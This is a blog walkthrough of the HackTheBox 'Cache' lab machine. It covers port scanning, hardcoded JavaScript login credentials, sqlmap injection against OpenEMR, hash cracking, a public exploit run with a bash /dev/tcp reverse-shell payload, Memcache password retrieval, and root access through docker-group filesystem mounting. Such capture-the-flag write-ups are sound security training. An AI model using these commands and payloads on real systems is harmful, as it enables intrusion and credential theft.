This page looks best with JavaScript enabled

HackTheBox: Cache

 ·  β˜• 4 min read

Enumeration:

Started by enumerating ports with nmap:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T5 10.10.10.188 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.10.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 11:23 CEST
Nmap scan report for 10.10.10.188
Host is up (0.013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds

After some manual enumeration, in the login webpage it is not doing any request to verify the login.
Keeping that in mind looking for where it is stored in and found http://cache.htb/jquery/functionality.js:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$(function(){
    
    var error_correctPassword = false;
    var error_username = false;
    
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         checkCorrectPassword();
         error_username = false;
         checkCorrectUsername();


        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });
    
});

Logged in with the credentials and got redirected to http://cache.htb/net.html. Found nothing else with that credentials, but kept them in case they are reused.

Then had a look to the author page:
Author

It looks like it’s using Virtual Hosting, and there is another project called HMS(Hospital Management System). Then added the following lines to /etc/hosts:

10.10.10.188      cache.htb
10.10.10.188      hms.htb

Intrussion:

After editing /etc/hosts opened hms.htb:
OpenEMR

It looks like a CMS so searched for public exploits or vulnerabilites and found an sql injection that allows us to get RCE. Then followed the guide:

  1. Captured with BurpSuite a request to http://hms.htb/portal/add_edit_event_user.php?eid=1 and saved it to a file.
    BurpSuite
  2. Enumerated the databases sqlmap -r request.txt --dbs --batch.
  3. Enumarated the tables sqlmap -r request.txt -D openemr --tables --batch.
  4. Listed the table “users_secure” sqlmap -r ~/Downloads/request.txt -D openemr -T users_secure --dump --batch.
  5. Then got the user and a hash, added the hash to a file and decrypted it with JohnTheRipper john hash.txt -w"rockyou.txt".
  6. Downloaded the exploit searchsploit -m 45161.
  7. Listened on port 443 for opening connections rlwrap nc -lvp 443.
  8. On another terminal ran the script python 45161.py -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.15.245/443 0>&1' http://hms.htb

Got a shell as www-data, then reused the credentials found in cache.htb with “ash” to get users.

Privesc:

Listed the users:

ash@cache:~$ awk -F: '($3 >=1000) && ($3 <= 1100) {print $1,$3}' /etc/passwd
ash 1000
luffy 1001

After some enumeration checked listening ports:

ash@cache:~$ netstat -tulnp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   

It has port 11211, it is Memcache’s default port. So enumerated the data that is stored in it:

ash@cache:~$ telnet localhost 11211

Listed all items:

stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 19
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 68
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 810
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END

Dumped the item with id 1:

stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

Finally got the password field:

get passwd
VALUE passwd 0 9
0n3_p1ec3
END

Scalated privilege to “luffy” and checked what groups we were in:

luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

As we have privileges to run dockers let’s see if there is any docker image:

luffy@cache:~$ docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        10 months ago       64.2MB

All we have to do to get root is run the docker container mounting all the filesystem inside the docker:

luffy@cache:~$ docker run -v /:/mnt/pwned -ti ubuntu

Resources

https://en.wikipedia.org/wiki/Virtual_hosting#:~:text=Virtual%20hosting%20is%20a%20method,use%20the%20same%20host%20name.
https://www.youtube.com/watch?v=DJSQ8Pk_7hc
https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
https://root4loot.com/post/docker-privilege-escalation/

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover